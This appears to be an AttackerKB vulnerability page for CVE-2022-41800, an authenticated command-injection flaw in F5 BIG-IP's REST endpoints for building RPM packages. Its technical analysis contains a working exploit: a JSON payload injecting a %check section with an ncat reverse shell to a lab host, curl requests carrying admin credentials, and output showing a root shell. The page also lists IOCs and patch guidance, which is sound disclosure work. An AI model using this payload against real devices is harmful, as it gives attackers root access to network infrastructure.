Very High
CVE-2022-41800
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2022-41800
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery Low
Technical Analysis
This permits a user who already has an administrator account to create a shell on the target device. There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer which is kind of a big deal.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- f5
Products
- big-ip access policy manager,
- big-ip access policy manager 17.0.0,
- big-ip advanced firewall manager,
- big-ip analytics,
- big-ip analytics 17.0.0,
- big-ip application acceleration manager,
- big-ip application acceleration manager 17.0.0,
- big-ip application security manager,
- big-ip application security manager 17.0.0,
- big-ip domain name system,
- big-ip domain name system 17.0.0,
- big-ip fraud protection service,
- big-ip fraud protection service 17.0.0,
- big-ip global traffic manager,
- big-ip global traffic manager 17.0.0,
- big-ip link controller,
- big-ip link controller 17.0.0,
- big-ip local traffic manager,
- big-ip local traffic manager 17.0.0,
- big-ip policy enforcement manager,
- big-ip policy enforcement manager 17.0.0
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Miscellaneous
Additional Info
Technical Analysis
Description
On November 16, 2022, F5 released an advisory in F5 Big-IP related to several vulnerabilities, including CVE-2022-41800, which is an authenticated remote code execution vulnerability in the iControl RPC interface.
CVE-2022-41800 requires valid administrative credentials (or an authorization bypass such as CVE-2022-1388) to exploit, as well as network-level access to the management interface, so it is unlikely to see widespread exploitation. We did create a Metasploit module to test your own devices, however.
The affected products are detailed in the vendor’s writeup. We tested these against F5 Big-IP 17.0.0.1.
Technical analysis
F5 Big-IP’s JSON API has an administrator-only endpoint that creates an RPM specification file (.rpmspec
) that is consumed by another administrator-only endpoint to create an RPM file. These endpoints are vulnerable to an injection attack into the RPM spec file, where additional fields can be added to the spec using newlines; notably, we can add executable shell commands that run when the resulting RPM file is created. This gives authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands in an unexpected way.
To demonstrate the vulnerability, we developed this JSON payload:
{ "specFileData": { "name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9" } }
Note the newlines and %check
in the description
field, which according to the documentation is typically used to run tests. We send that JSON as part of an authenticated request to /rpm-spec-creator
:
$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}' {"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}
The server responds with a specFilePath
containing the spec we created. Here’s what the file looks like on the file system:
$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec Summary: test9 Name: test Version: test6 Release: test7 BuildArch: noarch Group: Development/Libraries License: Commercial Packager: F5 Networks <support@f5.com> %description test8 %check ncat -e /bin/bash 10.0.0.179 4444 [...]
We start our listener on the host/port specified in the ncat
command:
$ nc -v -l -p 4444 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
And build the RPM with /build-package
(using jq
to format the output):
$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFile Path": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq { "step": "RUN_BUILD_RPM_TASK", "packageDirectory": "/tmp", "appName": "test", "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true, "rpmDescription": "Default exported iApp description.", "rpmSummary": "Default exported iApp summary.", "isSpecFileToCleanUp": false, "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578", "status": "CREATED", "userReference": { "link": "https://localhost/mgmt/shared/authz/users/admin" }, "identityReferences": [ { "link": "https://localhost/mgmt/shared/authz/users/admin" } ], "ownerMachineId": "97163127-c56e-456c-af33-752dec349873", "generation": 1, "lastUpdateMicros": 1666214391730921, "kind": "shared:iapp:build-package:buildrpmtaskstate", "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578" }
Then verify that we get a root in shell on our listener:
$ nc -v -l -p 4444 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.0.0.162. Ncat: Connection from 10.0.0.162:58068. whoami root
IOCs
When exploiting this vulnerability, two files are potentially created:
/var/config/rest/node/tmp/<random uuid>.spec
/var/config/rest/node/tmp/RPMS/noarch/<name>.noarch.rpm
The latter can be prevented if the %check
we inject exits with an error code, only creating the .spec
file, but that creates a log entry. In our Metasploit module, we remove both files as soon as we obtain a session.
Any access to the pair of RPM endpoints should also be considered suspicious, although they do have benign uses:
/mgmt/shared/iapp/build-package
/mgmt/shared/iapp/rpm-spec-creator
Additional files that may log this attack are:
/var/log/restjavad.*.log
contains error messages if the build fails (which doesn’t necessarily happen)
/var/log/restjavad-audit.*.log
is an access log, and will show those endpoints being accessed (which might be benign)
/var/log/restnoded/restnoded*.log
also shows the endpoints being accessed
Guidance
Administrators should patch their F5 Big-IP devices as per the guidance from the vendor. Additionally, organizations should ensure that the management interface for F5 Big-IP is not easily accessible on the network level.
References
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: